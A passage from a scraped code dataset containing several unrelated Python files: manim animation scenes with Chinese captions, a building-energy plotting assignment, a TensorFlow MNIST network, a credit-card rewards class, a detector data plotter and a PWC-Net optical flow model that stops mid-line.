all_txt.get_height()+ret_buff,\r\n width = all_txt.get_width()+ret_buff,\r\n color = BLACK,\r\n fill_opacity = 0.5,\r\n corner_radius = 0.2,\r\n stroke_opacity = 0\r\n ).move_to(all_txt)\r\n\r\n self.play(\r\n FadeIn(ret),\r\n LaggedStartMap(\r\n FadeInFromDown,all_txt,\r\n lag_ratio=0.2\r\n )\r\n )\r\n self.wait()\r\n\r\nclass Music7(Scene):\r\n def construct(self):\r\n introduction(\r\n self,\r\n name_ch = \"赫伯特·冯·卡拉扬\",\r\n name_eng = \"Herbert von Karajan\",\r\n bir = \"1908年4月5日-1989年7月16日\",\r\n intro = \"奥地利指挥家、演奏家、导演,被誉为“指挥帝王”\",\r\n ) \r\n\r\nclass Music8(Scene):\r\n def construct(self):\r\n img = ImageMobject(\"pic/茱莉亚学院\",height=FRAME_HEIGHT)\r\n self.add(img)\r\n introduction(\r\n self,\r\n name_ch = \"茱莉亚学院\",\r\n name_eng = \"The Juilliard School\",\r\n bir = \"成立于1905年\",\r\n intro = \"世界顶级的表演艺术学校之一\",\r\n )\r\n\r\nclass Music9(Scene):\r\n \r\n def construct(self):\r\n text1 = Text(\r\n \"为什么学乐器要先学钢琴?\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=1.5\r\n ).shift(0.238*UP)\r\n self.play(FadeInFromLarge(text1))\r\n self.wait()\r\n\r\nclass Music10(Scene):\r\n def construct(self):\r\n introduction(\r\n self,\r\n name_ch = \"西方音乐之父巴���在弹风琴(钢琴前身)\",\r\n )\r\n\r\nclass Music11(Scene):\r\n def construct(self):\r\n introduction(\r\n self,\r\n name_ch = \"幼年时期正在练琴的巴洛克流行天王亨德尔\",\r\n )\r\n\r\nclass Music12(Scene):\r\n def construct(self):\r\n introduction(\r\n self,\r\n name_ch = \"约瑟夫·海顿\",\r\n name_eng = \"Joseph Haydn\",\r\n )\r\n\r\n\r\nclass TianXin2(Scene):\r\n def construct(self):\r\n name_chinese = Text(\"再见小薇\",font=\"思源黑体 CN Heavy\",size=3)\r\n introduction = Text(\r\n \"她怯怯的低着头,不安地搓着双手,在候诊大厅走来走去\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=2,\r\n color=BLUE\r\n )\r\n all_txt = VGroup(\r\n name_chinese,\r\n introduction\r\n ).arrange(\r\n DOWN,\r\n aligned_edge=LEFT,\r\n buff = 0.5\r\n ).scale(0.36).to_corner(DL).shift(UP*0.5)\r\n ret_buff = 0.5\r\n ret = RoundedRectangle(\r\n height = all_txt.get_height()+ret_buff,\r\n width = all_txt.get_width()+ret_buff,\r\n color = BLACK,\r\n fill_opacity = 0.3,\r\n corner_radius = 0.15,\r\n stroke_opacity = 0\r\n ).move_to(all_txt)\r\n\r\n self.play(\r\n FadeIn(ret),\r\n LaggedStartMap(\r\n FadeInFromDown,all_txt,\r\n lag_ratio=0.2\r\n )\r\n )\r\n self.wait()\r\n\r\nclass TianXin3(Scene):\r\n def construct(self):\r\n text1 = Text(\r\n \"只有生命才能进入生命,\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=1.5\r\n ).shift(UP)\r\n text2 = Text(\r\n \"只有灵魂才能与灵魂交流。\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=1.5\r\n ).next_to(text1,DOWN,buff=0.36)\r\n self.play(\r\n LaggedStartMap(\r\n Write,\r\n [text1,text2],\r\n lag_ratio=1\r\n )\r\n )\r\n self.wait()\r\n\r\n\r\nclass TianXin4(Scene):\r\n def construct(self):\r\n name_chinese = Text(\"送别小薇\",font=\"思源黑体 CN Heavy\",size=3)\r\n introduction = Text(\r\n \"看着她小巧而坚毅的背影,我多了份暖心的回忆\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=1.8,\r\n color=BLUE\r\n )\r\n all_txt = VGroup(\r\n name_chinese,\r\n introduction\r\n ).arrange(\r\n DOWN,\r\n aligned_edge=LEFT,\r\n buff = 0.5\r\n ).scale(0.36).to_corner(DL).shift(UP*0.5)\r\n ret_buff = 0.5\r\n ret = RoundedRectangle(\r\n height = all_txt.get_height()+ret_buff,\r\n width = all_txt.get_width()+ret_buff,\r\n color = BLACK,\r\n fill_opacity = 0.3,\r\n corner_radius = 0.15,\r\n stroke_opacity = 0\r\n ).move_to(all_txt)\r\n\r\n self.play(\r\n FadeIn(ret),\r\n LaggedStartMap(\r\n FadeInFromDown,all_txt,\r\n lag_ratio=0.2\r\n )\r\n )\r\n self.wait()\r\n\r\nclass TianXin8(Scene):\r\n def construct(self):\r\n introduction(self,name_ch=\"遇见叙事,遇见更好的自己\" )\r\n self.wait()\r\n\r\nclass TianXin5(Scene):\r\n def construct(self):\r\n text2 = Text(\r\n \"口腔二科\",\r\n color = BLACK,\r\n size = 1\r\n )\r\n self.play(Write(text2))\r\n self.wait()\r\n\r\n\r\nclass TianXin5(Scene):\r\n def construct(self):\r\n text2 = Text(\r\n \"口腔二科\",\r\n color = BLACK,\r\n size = 1\r\n )\r\n self.play(Write(text2))\r\n self.wait()\r\n\r\nclass TianXin6(Scene):\r\n def construct(self):\r\n text3 = Text(\r\n \"汇报者:李艳、王樱、成真、谢智敏(医生)\",\r\n color=BLUE,\r\n size=1.2,\r\n )\r\n\r\n self.play(FadeInFromDirections(text3))\r\n self.wait()\r\n \r\nclass Text10(Scene):\r\n def construct(self):\r\n text = TexMobject(\"\\\\times10^6\",size=6,)\r\n self.add(text)\r\n self.wait()","sub_path":"Ag/MyCode/musicTian.py","file_name":"musicTian.py","file_ext":"py","file_size_in_byte":9819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"232171334","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#Load the path of the Excel files for AC consumption, Weather and irradiance\nDataPath=\"/Users/Marrugo/Dropbox/git_for_clone/Data-driven_Building_simulation_Polimi_EETBS/Data/\"\nconsumption=\"consumption_5545.csv\"\nweather=\"Austin_weather_2014.csv\"\nirradiance=\"irradiance_2014_gen.csv\"\n#compiling the path for the Excel files of AC consumption, Weather and irradiance\nConsumpitionFile=DataPath+consumption\nWeather=DataPath+weather\nIrradiance=DataPath+irradiance\n#import data frame of the values for AC consuption, Weather and irradiance\nDF_consumption=pd.read_csv(ConsumpitionFile,sep=\",\",index_col=0)\nDF_weather=pd.read_csv(Weather,sep=\";\",index_col=0)\nDF_irradiance=pd.read_csv(Irradiance,sep=\";\",index_col=1)\n#Change the index of the Data frame of weather to data time \npreviusindex=DF_weather.index\nparsedindex=pd.to_datetime(previusindex)\nDF_weather.index=parsedindex\n#Change the index of the Data frame of irradiance to data time\npreviusindex=DF_irradiance.index\nparsedindex=pd.to_datetime(previusindex)\nDF_irradiance.index=parsedindex\n#Change the index of the Data frame of consumption to data time\npreviusindex=DF_consumption.index\nparsedindex=pd.to_datetime(previusindex)\nDF_consumption.index=parsedindex\nDF_consumption.head()\n#Selecting the rage of AC consuption, Weather and irradiance between June 1th of 2014 until June 3th of 2014\nRangeDateConsumption=DF_consumption[\"2014-06-01 00:00:00\":\"2014-06-03 23:00:00\"]\nRangeDateWeather=DF_weather[[\"temperature\"]][\"2014-06-01 00:00:00\":\"2014-06-03 23:00:00\"]\nRangeDateIrradiance=DF_irradiance[[\"gen\"]][\"2014-06-01 00:00:00\":\"2014-06-03 23:00:00\"]\n#Correcting Irradiance data\nRangeDateIrradiance[RangeDateIrradiance[\"gen\"]<0]=0\n#Compiling data of AC consuption, Weather and irradiance\nDF_DataTexas=RangeDateConsumption.join([RangeDateWeather,RangeDateIrradiance])\n#Ploting the data\nDF_DataTexas.plot()\nplt.xlabel(\"time\")\nplt.ylabel(\"AC consumption (W)\")\n\n#Ploting using subplots a double Y axis\n\n#Defining number of subplots\nf, axes = plt.subplots(2, 1)\n#Ploting in subplot 1 data of AC consumption\naxes[0].plot(RangeDateConsumption, 'b-')\n#Y label for AC consumption in subplot 1\naxes[0].set_ylabel('AC consumption (W)', color='b')\naxes[0].tick_params('y', colors='b')\n#Creating double Y axis in subplot 1\nax21 = axes[0].twinx()\n#Ploting in subplot 1 data of weather\nax21.plot(RangeDateWeather, 'r-')\n#Y label weather in subplot 1\nax21.set_ylabel('Temperature (F)', color='r')\nax21.tick_params('y', colors='r')\n#Ploting in subplot 2 data of AC consumption\naxes[1].plot(RangeDateConsumption, 'b-')\n#x label for all data in all subplots \naxes[1].set_xlabel('Time (Data time)')\n#Y label for AC consumption in subplot 1\naxes[1].set_ylabel('AC consumption (W)', color='b')\naxes[1].tick_params('y', colors='b')\n#Creating double Y axis in subplot 2\nax22 = axes[1].twinx()\n#Ploting in subplot 2 data of Irradiance\nax22.plot(RangeDateIrradiance, 'r-')\n#Y label for Irradiance in subplot 2\nax22.set_ylabel('Irradiance (W/m2)', color='r')\nax22.tick_params('y', colors='r')\nplt.show()","sub_path":"Assignment 11- Deadline Dec19th_DataDrivenBuildingExplorationStep/Assignment11_MARRUGO/Assignment11_MARRUGO.py","file_name":"Assignment11_MARRUGO.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"55829510","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\n\nINPUT_NODE = 784 # 输入层\nOUTPUT_NODE = 10 # 输出层\n# 隐藏层\nL = 200\nM = 100\nN = 60\nO = 30\n\n\ndef get_weight_variable(shape, regularizer=None):\n \"\"\"\n 获取某一层的W参数\n :param shape: weight的shape\n :param regularizer: 正则化生成函数\n :return: weight\n \"\"\"\n weights = tf.Variable(tf.truncated_normal(shape, stddev=.1))\n\n # 如果提供了正则化函数,则一并加入regularization集合\n if regularizer is not None:\n tf.add_to_collection('regularization', regularizer(weights))\n\n return weights\n\ndef inference(X, regularizer):\n \"\"\"\n 定义神经网络前向传播过程\n :param X: 输入 X\n :param regularizer: 正则化函数\n :return: 输出 Y\n \"\"\"\n with tf.name_scope('layer'):\n W1 = get_weight_variable([INPUT_NODE, L], regularizer)\n b1 = tf.Variable(tf.constant(.1, shape=[L]))\n W2 = get_weight_variable([L, M], regularizer)\n b2 = tf.Variable(tf.constant(.1, shape=[M]))\n W3 = get_weight_variable([M, N], regularizer)\n b3 = tf.Variable(tf.constant(.1, shape=[N]))\n W4 = get_weight_variable([N, O], regularizer)\n b4 = tf.Variable(tf.constant(.1, shape=[O]))\n W5 = get_weight_variable([O, OUTPUT_NODE], regularizer)\n b5 = tf.Variable(tf.constant(.1, shape=[OUTPUT_NODE]))\n\n Y1 = tf.nn.relu(tf.matmul(X, W1) + b1)\n Y2 = tf.nn.relu(tf.matmul(Y1, W2) + b2)\n Y3 = tf.nn.relu(tf.matmul(Y2, W3) + b3)\n Y4 = tf.nn.relu(tf.matmul(Y3, W4) + b4)\n Ylogits = tf.matmul(Y4, W5) + b5\n\n return Ylogits\n","sub_path":"tf/relu/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"27118051","text":"# Written by Philip M. White \n# Copyright 2009.\n# Licensed under the BSD license.\n\nfrom CreditCard import *\n\nclass CreditCardAmexGoldDeltaSkymiles(CreditCard):\n\tdef __init__(self, airtravel):\n\t\tself.name = \"American Express Gold Delta Skymiles\"\n\t\tself.url = \"http://www201.americanexpress.com/getthecard/learn-about/Gold-Delta-Skymiles\"\n\t\tself.annual_fee = Money(95*100)\n\t\tself.reward_types = set(['travel'])\n\t\tself.airtravel = airtravel\n\n\tdef getAnnualRewardsEarned(self, s):\n\t\ts = min(Money(100000*100), s)\n\t\ttherest = s - self.airtravel\n\t\treturn self.airtravel*0.02 + therest*0.01\n","sub_path":"cards/CreditCardAmexGoldDeltaSkymiles.py","file_name":"CreditCardAmexGoldDeltaSkymiles.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"146338321","text":"#!/usr/bin/python3.4\n\nimport sys \nimport string\nimport time\n\nimport numpy as np\nfrom matplotlib import pyplot\n\nfrom femb_udp_cmdline import FEMB_UDP\nfemb = FEMB_UDP()\n\npyplot.ion()\npyplot.show()\n\nfrom pylab import rcParams\nrcParams['figure.figsize'] = 16, 8\n\nfig, ax = pyplot.subplots(2, 1)\n\nYfft_total = []\nfirst = 1\n\nwhile 1:\n data = femb.get_data(10)\n if data == None:\n time.sleep(1.)\n continue\n if len(data ) == 0:\n time.sleep(1.)\n continue\n xpoint = []\n ypoint = []\n num = 0\n\n for samp in data:\n chNum = ((samp >> 12 ) & 0xF)\n sampVal = (samp & 0xFFF)\n #print str(chNum) + \"\\t\" + str(sampVal) + \"\\t\" + str( hex(sampVal) )\n #if chNum == 0:\n xpoint.append(num*0.5)\n ypoint.append(sampVal)\n num = num + 1\n\n xarr = np.array(xpoint)\n yarr = np.array(ypoint)\n\n Fs = 2.0; # sampling rate\n Ts = 1.0/Fs; # sampling interval\n t = np.arange(0,1,Ts) # time vector\n\n n = len(yarr) # length of the signal\n k = np.arange(n)\n T = n/Fs\n frq = k/T # two sides frequency range\n frq = frq[range(n/2)] # one side frequency range\n\n Yfft = np.fft.fft(yarr)/n # fft computing and normalization\n Yfft = Yfft[range(n/2)]\n frq = frq[1:]\n Yfft = Yfft[1:]\n\n #do averaging and normalization, very messy\n pos = 0\n total = 0\n for x in np.nditer(Yfft):\n #print abs(x)\n total = total + abs(x)\n if first == 1:\n Yfft_total.append( abs(x) )\n else:\n Yfft_total[pos] = Yfft_total[pos] + abs(x)\n pos = pos + 1\t\n\n first = 0\n if total < 0 :\n time.sleep(0.1)\n continue\n\n pos = 0\n Yfft_norm = []\n for bin in Yfft_total:\n Yfft_norm.append( bin / total)\n\n ax[0].cla()\n ax[1].cla()\n ax[0].plot(xarr,yarr)\n ax[0].set_xlabel('Time [us]')\n ax[0].set_ylabel('Sample Value (ADC counts)')\n #ax[1].plot(frq,abs(Yfft),'r') # plotting the spectrum\n ax[1].plot(frq,Yfft_norm,'r') # plotting the spectrum\n ax[1].set_xlabel('Freq (MHz)')\n ax[1].set_ylabel('|Y(freq)|')\n\n pyplot.draw()\n time.sleep(0.1)\n #pyplot.clf()\n\t\n#need to exit nicely, ctrl-c for now\n\n\t\n","sub_path":"plot_data.py","file_name":"plot_data.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"628450685","text":"import torch\nimport math\nimport sys\nfrom asset import correlation\n\nbackwarp_tenGrid = {}\nbackwarp_tenPartial = {}\n\ndef backwarp(tenInput, tenFlow):\n\tif str(tenFlow.shape) not in backwarp_tenGrid:\n\t\ttenHor = torch.linspace(-1.0 + (1.0 / tenFlow.shape[3]), 1.0 - (1.0 / tenFlow.shape[3]), tenFlow.shape[3]).view(1, 1, 1, -1).expand(-1, -1, tenFlow.shape[2], -1)\n\t\ttenVer = torch.linspace(-1.0 + (1.0 / tenFlow.shape[2]), 1.0 - (1.0 / tenFlow.shape[2]), tenFlow.shape[2]).view(1, 1, -1, 1).expand(-1, -1, -1, tenFlow.shape[3])\n\n\t\tbackwarp_tenGrid[str(tenFlow.shape)] = torch.cat([ tenHor, tenVer ], 1).cuda()\n\t# end\n\n\tif str(tenFlow.shape) not in backwarp_tenPartial:\n\t\tbackwarp_tenPartial[str(tenFlow.shape)] = tenFlow.new_ones([ tenFlow.shape[0], 1, tenFlow.shape[2], tenFlow.shape[3] ])\n\t# end\n\n\ttenFlow = torch.cat([ tenFlow[:, 0:1, :, :] / ((tenInput.shape[3] - 1.0) / 2.0), tenFlow[:, 1:2, :, :] / ((tenInput.shape[2] - 1.0) / 2.0) ], 1)\n\ttenInput = torch.cat([ tenInput, backwarp_tenPartial[str(tenFlow.shape)] ], 1)\n\n\ttenOutput = torch.nn.functional.grid_sample(input=tenInput, grid=(backwarp_tenGrid[str(tenFlow.shape)] + tenFlow).permute(0, 2, 3, 1), mode='bilinear', padding_mode='zeros', align_corners=False)\n\n\ttenMask = tenOutput[:, -1:, :, :]; tenMask[tenMask > 0.999] = 1.0; tenMask[tenMask < 1.0] = 0.0\n\n\treturn tenOutput[:, :-1, :, :] * tenMask\n# end\n\n##########################################################\n\nclass Network(torch.nn.Module):\n\tdef __init__(self):\n\t\tsuper(Network, self).__init__()\n\n\t\tclass Extractor(torch.nn.Module):\n\t\t\tdef __init__(self):\n\t\t\t\tsuper(Extractor, self).__init__()\n\n\t\t\t\tself.netOne = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=16, out_channels=16, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=16, out_channels=16, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netTwo = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=32, out_channels=32, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=32, out_channels=32, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netThr = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=64, out_channels=64, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=64, out_channels=64, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netFou = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=64, out_channels=96, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=96, out_channels=96, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=96, out_channels=96, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netFiv = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=96, out_channels=128, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netSix = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=196, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=196, out_channels=196, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=196, out_channels=196, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\t\t\t# end\n\n\t\t\tdef forward(self, tenInput):\n\t\t\t\ttenOne = self.netOne(tenInput)\n\t\t\t\ttenTwo = self.netTwo(tenOne)\n\t\t\t\ttenThr = self.netThr(tenTwo)\n\t\t\t\ttenFou = self.netFou(tenThr)\n\t\t\t\ttenFiv = self.netFiv(tenFou)\n\t\t\t\ttenSix = self.netSix(tenFiv)\n\n\t\t\t\treturn [ tenOne, tenTwo, tenThr, tenFou, tenFiv, tenSix ]\n\t\t\t# end\n\t\t# end\n\n\t\tclass Decoder(torch.nn.Module):\n\t\t\tdef __init__(self, intLevel):\n\t\t\t\tsuper(Decoder, self).__init__()\n\n\t\t\t\tintPrevious = [ None, None, 81 + 32 + 2 + 2, 81 + 64 + 2 + 2, 81 + 96 + 2 + 2, 81 + 128 + 2 + 2, 81, None ][intLevel + 1]\n\t\t\t\tintCurrent = [ None, None, 81 + 32 + 2 + 2, 81 + 64 + 2 + 2, 81 + 96 + 2 + 2, 81 + 128 + 2 + 2, 81, None ][intLevel + 0]\n\n\t\t\t\tif intLevel < 6: self.netUpflow = torch.nn.ConvTranspose2d(in_channels=2, out_channels=2, kernel_size=4, stride=2, padding=1)\n\t\t\t\tif intLevel < 6: self.netUpfeat = torch.nn.ConvTranspose2d(in_channels=intPrevious + 128 + 128 + 96 + 64 + 32, out_channels=2, kernel_size=4, stride=2, padding=1)\n\t\t\t\tif intLevel < 6: self.fltBackwarp = [ None, None, None, 5.0, 2.5, 1.25, 0.625, None ][intLevel + 1]\n\n\t\t\t\tself.netOne = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent, out_channels=128, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netTwo = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent + 128, out_channels=128, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netThr = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent + 128 + 128, out_channels=96, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netFou = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent + 128 + 128 + 96, out_channels=64, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netFiv = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent + 128 + 128 + 96 + 64, out_channels=32, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netSix = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent + 128 + 128 + 96 + 64 + 32, out_channels=2, kernel_size=3, stride=1, padding=1)\n\t\t\t\t)\n\t\t\t# end\n\n\t\t\tdef forward(self, tenFirst, tenSecond, objPrevious):\n\t\t\t\ttenFlow = None\n\t\t\t\ttenFeat = None\n\n\t\t\t\tif objPrevious is None:\n\t\t\t\t\ttenFlow = None\n\t\t\t\t\ttenFeat = None\n\n\t\t\t\t\ttenVolume = torch.nn.functional.leaky_relu(input=correlation.FunctionCorrelation(tenFirst=tenFirst, tenSecond=tenSecond), negative_slope=0.1, inplace=False)\n\n\t\t\t\t\ttenFeat = torch.cat([ tenVolume ], 1)\n\n\t\t\t\telif objPrevious is not None:\n\t\t\t\t\ttenFlow = self.netUpflow(objPrevious['tenFlow'])\n\t\t\t\t\ttenFeat = self.netUpfeat(objPrevious['tenFeat'])\n\n\t\t\t\t\ttenVolume = torch.nn.functional.leaky_relu(input=correlation.FunctionCorrelation(tenFirst=tenFirst, tenSecond=backwarp(tenInput=tenSecond, tenFlow=tenFlow * self.fltBackwarp)), negative_slope=0.1, inplace=False)\n\n\t\t\t\t\ttenFeat = torch.cat([ tenVolume, tenFirst, tenFlow, tenFeat ], 1)\n\n\t\t\t\t# end\n\n\t\t\t\ttenFeat = torch.cat([ self.netOne(tenFeat), tenFeat ], 1)\n\t\t\t\ttenFeat = torch.cat([ self.netTwo(tenFeat), tenFeat ], 1)\n\t\t\t\ttenFeat = torch.cat([ self.netThr(tenFeat), tenFeat ], 1)\n\t\t\t\ttenFeat = torch.cat([ self.netFou(tenFeat), tenFeat ], 1)\n\t\t\t\ttenFeat = torch.cat([ self.netFiv(tenFeat), tenFeat ], 1)\n\n\t\t\t\ttenFlow = self.netSix(tenFeat)\n\n\t\t\t\treturn {\n\t\t\t\t\t'tenFlow': tenFlow,\n\t\t\t\t\t'tenFeat': tenFeat\n\t\t\t\t}\n\t\t\t# end\n\t\t# end\n\n\t\tclass Refiner(torch.nn.Module):\n\t\t\tdef __init__(self):\n\t\t\t\tsuper(Refiner, self).__init__()\n\n\t\t\t\tself.netMain = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=81 + 32 + 2 + 2 + 128 + 128 + 96 + 64 + 32, out_channels=128, kernel_size=3, stride=1, padding=1, dilation=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=2, dilation=2),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=4, dilation=4),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=96, kernel_size=3, stride=1, padding=8, dilation=8),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=96, out_channels=64, kernel_size=3, stride=1, padding=16, dilation=16),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=64, out_channels=32, kernel_size=3, stride=1, padding=1, dilation=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=32, out_channels=2, kernel_size=3, stride=1, padding=1, dilation=1)\n\t\t\t\t)\n\t\t\t# end\n\n\t\t\tdef forward(self, tenInput):\n\t\t\t\treturn self.netMain(tenInput)\n\t\t\t# end\n\t\t# end\n\n\t\tself.netExtractor = Extractor()\n\n\t\tself.netTwo = Decoder(2)\n\t\tself.netThr = Decoder(3)\n\t\tself.netFou = Decoder(4)\n\t\tself.netFiv = Decoder(5)\n\t\tself.netSix = Decoder(6)\n\n\t\tself.netRefiner = Refiner()\n\n\t\tself.load_state_dict({ strKey.replace('module', 'net'): tenWeight for strKey, tenWeight in torch.hub.load_state_dict_from_url(url='http://content.sniklaus.com/github/pytorch-pwc/network-' + 'default' + '.pytorch', file_name='pwc-' + 'default').items() })\n\t# end\n\n\tdef forward(self, tenFirst, tenSecond):\n\t\ttenFirst = self.netExtractor(tenFirst)\n\t\ttenSecond = self.netExtractor(tenSecond)\n\n\t\tobjEstimate = self.netSix(tenFirst[-1], tenSecond[-1], None)\n\t\tobjEstimate = self.netFiv(tenFirst[-2], tenSecond[-2], objEstimate)\n\t\tobjEstimate = self.netFou(tenFirst[-3], tenSecond[-3], objEstimate)\n\t\tobjEstimate = self.netThr(tenFirst[-4], tenSecond[-4], objEstimate)\n\t\tobjEstimate = self.netTwo(tenFirst[-5], tenSecond[-5], objEstimate)\n\n\t\treturn objEstimate['tenFlow'] + self.netRefiner(objEstimate['tenFeat'])\n\t# end\n# end\n\nnetNetwork = None\n\n##########################################################\n\ndef estimate(tenFirst, tenSecond):\n\tglobal netNetwork\n\n\tif netNetwork is None:\n\t\tnetNetwork = Network().cuda().eval()\n\t# end\n\n\tassert(tenFirst.shape[1] == tenSecond.shape[1])\n\tassert(tenFirst.shape[2] == tenSecond.shape[2])\n\n\tintWidth = tenFirst.shape[2]\n\tintHeight = tenFirst.shape[1]\n\n\t#assert(intWidth == 1024) # remember that there is no guarantee for correctness, comment this line out if you acknowledge this and want to continue\n\t#assert(intHeight == 436) # remember that there is no guarantee for correctness, comment this line out if you acknowledge this and want to continue\n\n\ttenPreprocessedFirst = tenFirst.cuda().view(1, 3, intHeight, intWidth)\n\ttenPreprocessedSecond = tenSecond.cuda().view(1, 3, intHeight, intWidth)\n\n\tintPreprocessedWidth = int(math.floor(math.ceil(intWidth / 64.0) * 64.0))\n\tintPreprocessedHeight = int(math.floor(math.ceil(intHeight / 64.0) * 64.0))\n\n\ttenPreprocessedFirst = torch.nn.functional.interpolate(input=tenPreprocessedFirst, size=(intPreprocessedHeight, 